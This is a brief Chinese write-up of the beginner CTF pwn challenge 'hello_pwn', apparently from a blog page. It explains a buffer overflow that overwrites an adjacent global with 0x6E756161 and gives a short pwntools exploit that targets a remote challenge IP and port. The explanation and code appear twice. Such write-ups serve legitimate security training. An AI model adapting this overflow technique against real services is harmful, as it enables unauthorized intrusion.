可以看到unk_601068跟dword_60106c是连在一起的,所以只需要在read处溢出unk_601068覆盖dword_60106c为0x6E756161即可
exp:
from pwn import *
# p = process('./hello_pwn')
p = remote("111.198.29.45","31004")
payload = 4*'a' + p32(0x6E756161)
p.sendline(payload)
p.interactive()
可以看到unk_601068跟dword_60106c是连在一起的,所以只需要在read处溢出unk_601068覆盖dword_60106c为0x6E756161即可
exp:
from pwn import *
# p = process('./hello_pwn')
p = remote("111.198.29.45","31004")
payload = 4*'a' + p32(0x6E756161)
p.sendline(payload)
p.interactive()
本文标题:新手练习04-hello_pwn
本文链接:https://www.haomeiwen.com/subject/njgoeqtx.html
网友评论